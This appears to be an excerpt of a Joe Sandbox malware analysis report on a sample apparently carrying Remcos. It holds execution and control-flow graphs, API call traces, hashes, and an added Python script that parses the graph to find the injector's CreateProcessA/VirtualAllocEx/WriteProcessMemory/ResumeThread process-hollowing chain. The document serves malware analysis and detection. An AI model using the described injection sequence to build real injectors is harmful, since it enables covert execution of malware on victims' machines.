                        execution_graph 41104 2d0d040 41105 2d0d086 41104->41105 41109 2d0d618 41105->41109 41113 2d0d628 41105->41113 41106 2d0d173 41110 2d0d628 41109->41110 41116 2d0d27c 41110->41116 41114 2d0d27c DuplicateHandle 41113->41114 41115 2d0d656 41114->41115 41115->41106 41117 2d0d690 DuplicateHandle 41116->41117 41118 2d0d656 41117->41118 41118->41106 41119 2d0acb0 41122 2d0ada8 41119->41122 41120 2d0acbf 41123 2d0addc 41122->41123 41124 2d0adb9 41122->41124 41123->41120 41124->41123 41125 2d0afe0 GetModuleHandleW 41124->41125 41126 2d0b00d 41125->41126 41126->41120 40940 4da0fd2 40941 4da0f65 40940->40941 40942 4da0fd5 40940->40942 40941->40940 40945 4da1b29 40941->40945 40950 4da1b38 40941->40950 40942->40942 40946 4da1b52 40945->40946 40955 4da1e70 40946->40955 40973 4da1e60 40946->40973 40947 4da1b5a 40947->40941 40951 4da1b52 40950->40951 40953 4da1e70 10 API calls 40951->40953 40954 4da1e60 10 API calls 40951->40954 40952 4da1b5a 40952->40941 40953->40952 40954->40952 40956 4da1e85 40955->40956 40957 4da1e97 40956->40957 40991 4da22bd 40956->40991 40996 4da257e 40956->40996 41000 4da20fa 40956->41000 41006 4da2266 40956->41006 41011 4da2700 40956->41011 41016 4da200d 40956->41016 41021 4da234c 40956->41021 41026 4da250f 40956->41026 41030 4da2228 40956->41030 41034 4da2448 40956->41034 41040 4da23cb 40956->41040 41045 4da21eb 40956->41045 41050 4da2315 40956->41050 41054 4da23b5 40956->41054 41059 4da20d0 40956->41059 40957->40947 40974 4da1e85 40973->40974 40975 4da20fa 2 API calls 40974->40975 40976 4da257e 2 API calls 40974->40976 40977 4da22bd 2 API calls 40974->40977 40978 4da20d0 2 API calls 40974->40978 40979 4da23b5 2 API calls 40974->40979 40980 4da2315 2 API calls 40974->40980 40981 4da1e97 40974->40981 40982 4da21eb 2 API calls 40974->40982 40983 4da23cb 2 API calls 40974->40983 40984 4da2448 2 API calls 40974->40984 40985 4da2228 2 API calls 40974->40985 40986 4da250f 2 API calls 40974->40986 40987 4da234c 2 API calls 40974->40987 
40988 4da200d 2 API calls 40974->40988 40989 4da2700 2 API calls 40974->40989 40990 4da2266 2 API calls 40974->40990 40975->40981 40976->40981 40977->40981 40978->40981 40979->40981 40980->40981 40981->40947 40982->40981 40983->40981 40984->40981 40985->40981 40986->40981 40987->40981 40988->40981 40989->40981 40990->40981 40992 4da22c3 40991->40992 41063 4da0628 40992->41063 41067 4da0622 40992->41067 40993 4da29ef 41071 4da0538 40996->41071 41075 4da0532 40996->41075 40997 4da25ac 40997->40957 41002 4da2100 41000->41002 41001 4da2a62 41002->41001 41079 712fed0 41002->41079 41083 712feca 41002->41083 41003 4da27d3 41007 4da226c 41006->41007 41009 4da0538 WriteProcessMemory 41007->41009 41010 4da0532 WriteProcessMemory 41007->41010 41008 4da229e 41008->40957 41009->41008 41010->41008 41013 4da2706 41011->41013 41012 4da27d3 41014 712fed0 ResumeThread 41013->41014 41015 712feca ResumeThread 41013->41015 41014->41012 41015->41012 41017 4da2017 41016->41017 41087 4da07c0 41017->41087 41091 4da07b6 41017->41091 41022 4da22d5 41021->41022 41024 4da0628 ReadProcessMemory 41022->41024 41025 4da0622 ReadProcessMemory 41022->41025 41023 4da29ef 41024->41023 41025->41023 41027 4da20dc 41026->41027 41027->41026 41096 4da0478 41027->41096 41100 4da0472 41027->41100 41031 4da20dc 41030->41031 41032 4da0478 VirtualAllocEx 41031->41032 41033 4da0472 VirtualAllocEx 41031->41033 41032->41031 41033->41031 41036 4da22d5 41034->41036 41035 4da273f 41035->40957 41036->41035 41038 4da0628 ReadProcessMemory 41036->41038 41039 4da0622 ReadProcessMemory 41036->41039 41037 4da29ef 41038->41037 41039->41037 41041 4da23d4 41040->41041 41043 4da0538 WriteProcessMemory 41041->41043 41044 4da0532 WriteProcessMemory 41041->41044 41042 4da2904 41043->41042 41044->41042 41046 4da2209 41045->41046 41046->40957 41048 4da0628 ReadProcessMemory 41046->41048 41049 4da0622 ReadProcessMemory 41046->41049 41047 4da29ef 41048->41047 41049->41047 41051 4da20dc 41050->41051 41052 4da0478 VirtualAllocEx 
41051->41052 41053 4da0472 VirtualAllocEx 41051->41053 41052->41051 41053->41051 41055 4da227d 41054->41055 41056 4da229e 41055->41056 41057 4da0538 WriteProcessMemory 41055->41057 41058 4da0532 WriteProcessMemory 41055->41058 41056->40957 41057->41056 41058->41056 41060 4da20dc 41059->41060 41061 4da0478 VirtualAllocEx 41060->41061 41062 4da0472 VirtualAllocEx 41060->41062 41061->41060 41062->41060 41064 4da0673 ReadProcessMemory 41063->41064 41066 4da06b7 41064->41066 41066->40993 41068 4da0673 ReadProcessMemory 41067->41068 41070 4da06b7 41068->41070 41070->40993 41072 4da0580 WriteProcessMemory 41071->41072 41074 4da05d7 41072->41074 41074->40997 41076 4da0580 WriteProcessMemory 41075->41076 41078 4da05d7 41076->41078 41078->40997 41080 712ff10 ResumeThread 41079->41080 41082 712ff41 41080->41082 41082->41003 41084 712ff10 ResumeThread 41083->41084 41086 712ff41 41084->41086 41086->41003 41088 4da0849 41087->41088 41088->41088 41089 4da09ae CreateProcessA 41088->41089 41090 4da0a0b 41089->41090 41090->41090 41092 4da0792 41091->41092 41093 4da07bb CreateProcessA 41091->41093 41092->40957 41095 4da0a0b 41093->41095 41095->41095 41097 4da04b8 VirtualAllocEx 41096->41097 41099 4da04f5 41097->41099 41099->41027 41101 4da04b8 VirtualAllocEx 41100->41101 41103 4da04f5 41101->41103 41103->41027 41190 2d04668 41191 2d0467a 41190->41191 41192 2d04686 41191->41192 41194 2d04779 41191->41194 41195 2d0479d 41194->41195 41199 2d04888 41195->41199 41203 2d04879 41195->41203 41200 2d048af 41199->41200 41201 2d0498c 41200->41201 41207 2d044c4 41200->41207 41205 2d04888 41203->41205 41204 2d0498c 41204->41204 41205->41204 41206 2d044c4 CreateActCtxA 41205->41206 41206->41204 41208 2d05918 CreateActCtxA 41207->41208 41210 2d059db 41208->41210 41127 136d01c 41128 136d034 41127->41128 41129 136d08e 41128->41129 41132 5322818 41128->41132 41137 5322808 41128->41137 41134 5322845 41132->41134 41133 5322877 41134->41133 41142 5322991 41134->41142 41147 53229a0 41134->41147 41138 
5322818 41137->41138 41139 5322877 41138->41139 41140 53229a0 4 API calls 41138->41140 41141 5322991 4 API calls 41138->41141 41140->41139 41141->41139 41144 53229a0 41142->41144 41143 5322a40 41143->41133 41152 5322a58 41144->41152 41155 5322a48 41144->41155 41149 53229b4 41147->41149 41148 5322a40 41148->41133 41150 5322a58 4 API calls 41149->41150 41151 5322a48 4 API calls 41149->41151 41150->41148 41151->41148 41153 5322a69 41152->41153 41159 5324013 41152->41159 41153->41143 41156 5322a58 41155->41156 41157 5322a69 41156->41157 41158 5324013 4 API calls 41156->41158 41157->41143 41158->41157 41165 5324030 41159->41165 41169 5323fe8 41159->41169 41173 5323f54 41159->41173 41177 5324040 41159->41177 41160 532402a 41160->41153 41166 5324040 41165->41166 41167 53240da CallWindowProcW 41166->41167 41168 5324089 41166->41168 41167->41168 41168->41160 41171 5323ff4 41169->41171 41170 53240da CallWindowProcW 41172 5324089 41170->41172 41171->41160 41171->41170 41171->41172 41172->41160 41174 5323f86 41173->41174 41174->41160 41175 53240da CallWindowProcW 41174->41175 41176 5324089 41174->41176 41175->41176 41176->41160 41178 532405e 41177->41178 41179 53240da CallWindowProcW 41178->41179 41180 5324089 41178->41180 41179->41180 41180->41160 41181 4da2df0 41182 4da2f7b 41181->41182 41183 4da2e16 41181->41183 41183->41182 41186 4da3069 PostMessageW 41183->41186 41188 4da3070 PostMessageW 41183->41188 41187 4da30dc 41186->41187 41187->41183 41189 4da30dc 41188->41189 41189->41183
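The execution graph above records the injector's API chain. From the function at 4da1e70, the path through 4da200d and 4da07c0 reaches CreateProcessA, the path through 4da250f and 4da0478 reaches VirtualAllocEx, the path through 4da2266 and 4da0538 reaches WriteProcessMemory, and the path through 4da2700 and 712fed0 reaches ResumeThread. Create a process, allocate inside it, write into it, resume it: that is the RunPE / process-hollowing sequence behind the "Injects a PE file into a foreign processes" signature, and it fits target 7 being a copy of the sample whose Remcos image sits at 0x400000. The Python below is an added example, not part of the report: it parses an excerpt of the execution_graph dump (node id, hex address, optional API label, then a->b edges) into a graph, computes which APIs are reachable from each node, and reports the addresses from which the whole RunPE set can be reached. Treating any CamelCase label as an API name, and requiring exactly these four calls, are this example's own assumptions; the graph does not show SetThreadContext or NtUnmapViewOfSection, so neither is required.

```python
import re
from collections import defaultdict, deque

# Excerpt of the execution_graph dump above (node id, address, optional API
# label, then "a->b" edges), trimmed to the functions that matter here.
GRAPH_EXCERPT = """
40955 4da1e70 40956 4da1e85 40955->40956 40957 4da1e97 40956->40957
40996 4da257e 40956->40996 41000 4da20fa 40956->41000 41006 4da2266 40956->41006
41011 4da2700 40956->41011 41016 4da200d 40956->41016 41026 4da250f 40956->41026
41071 4da0538 40996->41071 41072 4da0580 WriteProcessMemory 41071->41072
41002 4da2100 41000->41002 41079 712fed0 41002->41079 41080 712ff10 ResumeThread 41079->41080
41007 4da226c 41006->41007 41009 4da0538 WriteProcessMemory 41007->41009
41013 4da2706 41011->41013 41014 712fed0 ResumeThread 41013->41014
41017 4da2017 41016->41017 41087 4da07c0 41017->41087 41088 4da0849 41087->41088
41088->41088 41089 4da09ae CreateProcessA 41088->41089
41027 4da20dc 41026->41027 41027->41026 41096 4da0478 41027->41096
41097 4da04b8 VirtualAllocEx 41096->41097
41104 2d0d040 41105 2d0d086 41104->41105 41113 2d0d628 41105->41113
41114 2d0d27c DuplicateHandle 41113->41114
41119 2d0acb0 41122 2d0ada8 41119->41122 41124 2d0adb9 41122->41124
41125 2d0afe0 GetModuleHandleW 41124->41125
"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}$")           # addresses in this dump are 7 hex digits
API_RE = re.compile(r"^[A-Z][a-z]+[A-Za-z0-9]*$")   # CamelCase label = Win32 API; skips "10 API calls"

# The four calls that make up the classic RunPE / process-hollowing sequence.
RUNPE_APIS = {"CreateProcessA", "VirtualAllocEx", "WriteProcessMemory", "ResumeThread"}


def parse_execution_graph(text):
    """Tokenise the dump into nodes {id: (address, [labels])} and edges {id: {ids}}."""
    nodes, edges, current = {}, defaultdict(set), None
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[int(edge.group(1))].add(int(edge.group(2)))
        elif (tok.isdigit() and i + 1 < len(tokens)
              and ADDR_RE.match(tokens[i + 1]) and not tokens[i + 1].isdigit()):
            current = int(tok)                        # "<id> <hex address>" starts a node
            nodes[current] = (tokens[i + 1], [])
            i += 1
        elif current is not None:
            nodes[current][1].append(tok)             # anything else is label text for the last node
        i += 1
    return nodes, edges


def reachable_apis(nodes, edges, start):
    """APIs on any path from `start`, by breadth-first search over the edges."""
    seen, queue, apis = {start}, deque([start]), set()
    while queue:
        n = queue.popleft()
        apis.update(t for t in nodes.get(n, ("", []))[1] if API_RE.match(t))
        for m in edges.get(n, ()):
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return apis


def find_runpe_entry_points(nodes, edges):
    """Addresses from which every RunPE API is reachable: the injector's entry function(s)."""
    hits = {}
    for nid, (addr, _) in nodes.items():
        apis = reachable_apis(nodes, edges, nid)
        if RUNPE_APIS <= apis:
            hits[addr] = sorted(apis)
    return hits


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_EXCERPT)
    for addr, apis in sorted(find_runpe_entry_points(nodes, edges).items()):
        print(f"{addr}: {', '.join(apis)}")
```

Run on the excerpt it reports 4da1e70 and its first block 4da1e85, and nothing from the DuplicateHandle or GetModuleHandleW functions. The tokeniser keys node starts on "digits followed by a hex address" rather than on a regex over the whole line, because an edge target such as 41088 followed by a node id such as 41089 would otherwise be misread as a node with a numeric address.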

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 294 7120d8a-7120d8c 295 7120d8e-7120d9b 294->295 296 7120e0d-7120e64 294->296 295->296 297 7120e71-7120e90 296->297 298 7120e66-7120e68 296->298 301 7120e92 297->301 302 7120e94-7120f25 297->302 299 7120e6a-7120e6c 298->299 300 7120e6f-7120e70 298->300 299->300 300->297 301->302 306 7120f27 302->306 307 7120f2c-7120f68 302->307 306->307 374 7120f6a call 71214a3 307->374 375 7120f6a call 71214b0 307->375 309 7120f70-7120f72 310 7120f75 309->310 311 7120f7c-7120f98 310->311 312 7120fa1-7120fa2 311->312 313 7120f9a 311->313 319 71212d9-71212e0 312->319 313->310 313->312 314 71210b2-71210b6 313->314 315 7121116-7121123 313->315 316 7120ff6-7121022 313->316 317 7121158-712115c 313->317 318 7121058-7121078 313->318 313->319 320 712121e-712122a 313->320 321 712103e-7121053 313->321 322 712107d-7121086 313->322 323 7121202-7121219 313->323 324 7120fe2-7120ff4 313->324 325 71210e2-71210ee 313->325 326 71211a1-71211ad 313->326 327 7120fa7-7120fcc 313->327 328 7121027-7121039 313->328 329 71211cb-71211d7 313->329 330 7121188-712119c 313->330 331 7121128-712112c 313->331 332 7120fce-7120fe0 313->332 333 71212ac-71212b8 313->333 342 71210b8-71210c7 314->342 343 71210c9-71210d0 314->343 315->311 316->311 350 712115e-712116d 317->350 351 712116f-7121176 317->351 318->311 344 7121231-7121247 320->344 345 712122c 320->345 321->311 340 7121088-7121097 322->340 341 7121099-71210a0 322->341 323->311 324->311 346 71210f0 325->346 347 71210f5-7121111 325->347 334 71211b4-71211c6 326->334 335 71211af 326->335 327->311 328->311 338 71211d9 329->338 339 71211de-71211fd 329->339 330->311 348 712112e-712113d 331->348 349 712113f-7121146 331->349 332->311 336 71212ba 333->336 337 71212bf-71212d4 333->337 334->311 335->334 336->337 337->311 338->339 339->311 353 71210a7-71210ad 340->353 341->353 354 71210d7-71210dd 342->354 343->354 365 7121249 344->365 366 712124e-7121264 344->366 345->344 346->347 347->311 355 712114d-7121153 348->355 349->355 357 
712117d-7121183 350->357 351->357 353->311 354->311 355->311 357->311 365->366 368 7121266 366->368 369 712126b-7121281 366->369 368->369 371 7121283 369->371 372 7121288-71212a7 369->372 371->372 372->311 374->309 375->309
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0%p1$0%p1$0%p1
                        • API String ID: 0-1740658550
                        • Opcode ID: ac25bec91c568bf1e4c591219c161eb4c9734baacf8408e9b81651c8d09a767e
                        • Instruction ID: bbb3ed1be3dae5615fef50c66e61d6e300f42faa3b1bc86ee3391b535853fab5
                        • Opcode Fuzzy Hash: ac25bec91c568bf1e4c591219c161eb4c9734baacf8408e9b81651c8d09a767e
                        • Instruction Fuzzy Hash: B2F1BFB190925ADFCB09CFA8C4804EEFFB1FF4A310B248595E441AB255D334AA93DF90

                        Control-flow Graph
                        • Graph image omitted; basic blocks 7120e10-71212e0, calls to 71214a3 and 71214b0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0%p1$0%p1$0%p1
                        • API String ID: 0-1740658550
                        • Opcode ID: ef319aa1aa2e26f4bdec4a706a679e892870ada38d886d1aea53a7ae747444dc
                        • Instruction ID: cc90187217e36cc379f56d0fc99b10fe5025fcd9078068fb00c63fc55b3c2107
                        • Opcode Fuzzy Hash: ef319aa1aa2e26f4bdec4a706a679e892870ada38d886d1aea53a7ae747444dc
                        • Instruction Fuzzy Hash: CEF1AEB190925ADFCB08CFA9C4804EEFFB1FF4A311B248595E441AB255D734AA93DF90

                        Control-flow Graph
                        • Graph image omitted; basic blocks 7120f00-71212e0, calls to 71214a3 and 71214b0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0%p1$0%p1$0%p1
                        • API String ID: 0-1740658550
                        • Opcode ID: a7a339bfe18e6a59fe3d159bc2280b5b245f10036d39e9fc3ad5fc56d5182d8b
                        • Instruction ID: 8082b24973a9fa1a6c83c9a60817d6b1432c5be049d3ced7875748ac6be774af
                        • Opcode Fuzzy Hash: a7a339bfe18e6a59fe3d159bc2280b5b245f10036d39e9fc3ad5fc56d5182d8b
                        • Instruction Fuzzy Hash: 22C17EB0E1521ADFCB08CFA9C4804AEFBB2FF89301F21D559E401AB254C734AA52DF94

                        Control-flow Graph
                        • Graph image omitted; basic blocks 5326f40-5328152, calls to helper routines in the 5326b18-5326d04 range and to 2d0eba3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Pp]q$Te]q
                        • API String ID: 0-2891114514
                        • Opcode ID: 4b634f176863cea5f2221229e91d2e5bc74ff73ef2ef585f7161f4a451fe11f8
                        • Instruction ID: 2d049613ee47ec6d78f9b07cf9ec29a17c067a58200256c496916d4296c7ac04
                        • Opcode Fuzzy Hash: 4b634f176863cea5f2221229e91d2e5bc74ff73ef2ef585f7161f4a451fe11f8
                        • Instruction Fuzzy Hash: AC929374A016298FDB64EF69C998ADDB7B2FF89300F1085E9D409A7365DB309E85CF40

                        Control-flow Graph
                        • Graph image omitted; basic blocks 5326f1f-5328152, calls to helper routines in the 5326b18-5326d04 range and to 2d0eba3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Pp]q
                        • API String ID: 0-2528107101
                        • Opcode ID: f7ab16fce0d04620c6a48e199895fbf494de362b9abd823845fb2bcdcc9e4221
                        • Instruction ID: 715f6449825db593dfbb9086f2345686b2b8bd04af1762bfda049fed94f7e3e5
                        • Opcode Fuzzy Hash: f7ab16fce0d04620c6a48e199895fbf494de362b9abd823845fb2bcdcc9e4221
                        • Instruction Fuzzy Hash: B862A634A016298FDB54EF65C898ADDB7B2FF89300F1185E9D809AB365DB319E85CF40

                        Control-flow Graph
                        • Graph image omitted; basic blocks 532782c-5328152, calls to helper routines in the 5326bd4-5326d04 range and to 2d0eba3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Pp]q
                        • API String ID: 0-2528107101
                        • Opcode ID: 4dcfe3a6d10a0e728766cdf8d9655ee353fc80299ab4177c096d7e46d8324ebb
                        • Instruction ID: e61090ca1515da1ca289269c8fdb7bdbb54f5a4f5b7fe5f2c98c291d32fa3af3
                        • Opcode Fuzzy Hash: 4dcfe3a6d10a0e728766cdf8d9655ee353fc80299ab4177c096d7e46d8324ebb
                        • Instruction Fuzzy Hash: 18428334A01269CFCB65EF64C998A9DB7B2FF89301F5081E9D409A7365DB31AE85CF40
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 7{f'
                        • API String ID: 0-2192695807
                        • Opcode ID: ed4ddc4229ec776adfea20f24d2d48864f6745701c61227bf8d207ecbad787dd
                        • Instruction ID: 675d052086580d61ff6e94f77ac85ceed7728a5b32ca9a9a245214599a2ff48d
                        • Opcode Fuzzy Hash: ed4ddc4229ec776adfea20f24d2d48864f6745701c61227bf8d207ecbad787dd
                        • Instruction Fuzzy Hash: F3A12BB0E16259DFCB08CFD5D681ADDFBB2FB8A300F20A416E805B7294D7349D169B14
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 7{f'
                        • API String ID: 0-2192695807
                        • Opcode ID: c7362c0afcf6db946927a306ec10ac76d2d920857c6aa0baa11125835331b438
                        • Instruction ID: 04ac3522772d370466a71f926afa28c8acee0f58ba381e3e1c2369de7f4b7f1b
                        • Opcode Fuzzy Hash: c7362c0afcf6db946927a306ec10ac76d2d920857c6aa0baa11125835331b438
                        • Instruction Fuzzy Hash: D0A13DB0E16259DFCB08CFE5D681A9DFBB2FB89300F24A416E805B7294D7349D16DB14
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Z
                        • API String ID: 0-1862792848
                        • Opcode ID: 470d2fad2f4536b2a9696db30a01ced1cbce0fba3c90679d4fae90dea5dbaa82
                        • Instruction ID: 99f3b45d945b106e0ba332206646ddfdba1969cb084f0412e1810c77c5d449c7
                        • Opcode Fuzzy Hash: 470d2fad2f4536b2a9696db30a01ced1cbce0fba3c90679d4fae90dea5dbaa82
                        • Instruction Fuzzy Hash: AB913AB4E15269CFCB08DF99D8809EEFBB1FF89200F109519D815B7258D7359912CF94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Z
                        • API String ID: 0-1862792848
                        • Opcode ID: 4351435b8d9f01d05ac8a00d9f4b6187d7abfa6b2783a4f5a4cb9d2ff3c3511a
                        • Instruction ID: 6994664c4c5bbfbeefc7e31bcd2a7e35e71c1f085c38025b44aba00840b4ef04
                        • Opcode Fuzzy Hash: 4351435b8d9f01d05ac8a00d9f4b6187d7abfa6b2783a4f5a4cb9d2ff3c3511a
                        • Instruction Fuzzy Hash: 838129B4E15269CFCB08DFA9D8809EEFBB2FF89200F10951AD815B7258D7359912CF94
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cb28576de8607c019919ec5eaff4d4cc4985207e2f89189934408075a4c9afb
                        • Instruction ID: 61ea0a3bcbaec6fc76d12e1e9f5920872960c5dbdfef21b39454c1efb5f7c29d
                        • Opcode Fuzzy Hash: 5cb28576de8607c019919ec5eaff4d4cc4985207e2f89189934408075a4c9afb
                        • Instruction Fuzzy Hash: FB41E6B4E14508EFCB08CF5AE184899FBF2FF89200F56C0A5D858A7365DB35EA159B04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2492a177d18eaea10bd372a8c4b0a8822b93cec0ee19a4b973dc09bfb0a71c5
                        • Instruction ID: b10f9070fb1ac95993b063ca54303ad02f1f7bc2a477372b1bd24c56d7e3e9ce
                        • Opcode Fuzzy Hash: f2492a177d18eaea10bd372a8c4b0a8822b93cec0ee19a4b973dc09bfb0a71c5
                        • Instruction Fuzzy Hash: CD4106B4E10508EFCB08CF5AD184999FBF2FF89210F56C0D5D868AB265DB35EA15CB04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 602b02da72cb0747b0cd1dc3f76cf2b18c22b8bcfc4b839cb66079754556bf75
                        • Instruction ID: 6db9d6f6c9d91f457cb0f3ad701cd72101c3973bd77a1c97e352c981ed1bbffa
                        • Opcode Fuzzy Hash: 602b02da72cb0747b0cd1dc3f76cf2b18c22b8bcfc4b839cb66079754556bf75
                        • Instruction Fuzzy Hash: 293142B1D053898FDB19CFA6C95429EBFB3AF8A310F18C0AAD444AA265DB740945CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cfce62b35e9601e6e0a2d55f843475776b82f28abb320e4e88bb86b2aac496e
                        • Instruction ID: 754ba51f7737eb2ec554621e263c07167cac87c525018eb2d10572350507ef7e
                        • Opcode Fuzzy Hash: 9cfce62b35e9601e6e0a2d55f843475776b82f28abb320e4e88bb86b2aac496e
                        • Instruction Fuzzy Hash: 8621E7B1E006189BDB18CFABD9442DEFBF7AFC9310F14C16AD408A6268DB751A56CF50

                        Control-flow Graph
                        • Graph image omitted; basic blocks 4da0792-4da0b05, CreateProcessA called in block 4da094f-4da0a09
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DA09F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: e1e6c226e8f770e48196ffd99a64f64f95b66b576058e6fa34ae9368cff737f1
                        • Instruction ID: 8f159f3dd3ccbd44a96dc2f8120ba8e238ca68706e1dbd91f5115fe47ae2f4a0
                        • Opcode Fuzzy Hash: e1e6c226e8f770e48196ffd99a64f64f95b66b576058e6fa34ae9368cff737f1
                        • Instruction Fuzzy Hash: E0A16971D00219CFEB25DF68C8417EEBBF2BF48314F1485AAD809A7250DB74A995CF92

                        Control-flow Graph
                        • Graph image omitted; basic blocks 4da07c0-4da0b05, CreateProcessA called in block 4da094f-4da0a09
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DA09F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 1c3801d3ff99dd48b3fc671576b3923f31d15a17aa9a3285c4fada184b21a2a2
                        • Instruction ID: 4556f4e9c1ef2f7155b5f5d617645b93aa9c031bc38a045adb2a6c722c2bb487
                        • Opcode Fuzzy Hash: 1c3801d3ff99dd48b3fc671576b3923f31d15a17aa9a3285c4fada184b21a2a2
                        • Instruction Fuzzy Hash: 25916B71D00219DFEB25DF68C840BDEBBF2BF48314F1485A9D809A7250DB74A995CF92

                        Control-flow Graph
                        • Graph image omitted; basic blocks 2d0ada8-2d0b028, calls to 2d0a0cc, 2d0a0d8, 2d0a0e8, 2d0a0f8, 2d0a108, 2d0b031 and 2d0b040; GetModuleHandleW called in block 2d0afe0-2d0b00b
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02D0AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 48912c453963554924efbbbdeea1292278b9bc27bb86a69adceeff15da933b58
                        • Instruction ID: 523a56d18820780275a29f09f7aba0274b1b3c90164228078c1a1bf23ed195f1
                        • Opcode Fuzzy Hash: 48912c453963554924efbbbdeea1292278b9bc27bb86a69adceeff15da933b58
                        • Instruction Fuzzy Hash: BD710470A00B058FD724DF2AD484B5ABBF5FF48744F10892DD58A97BA0DB75E849CB90
                        APIs
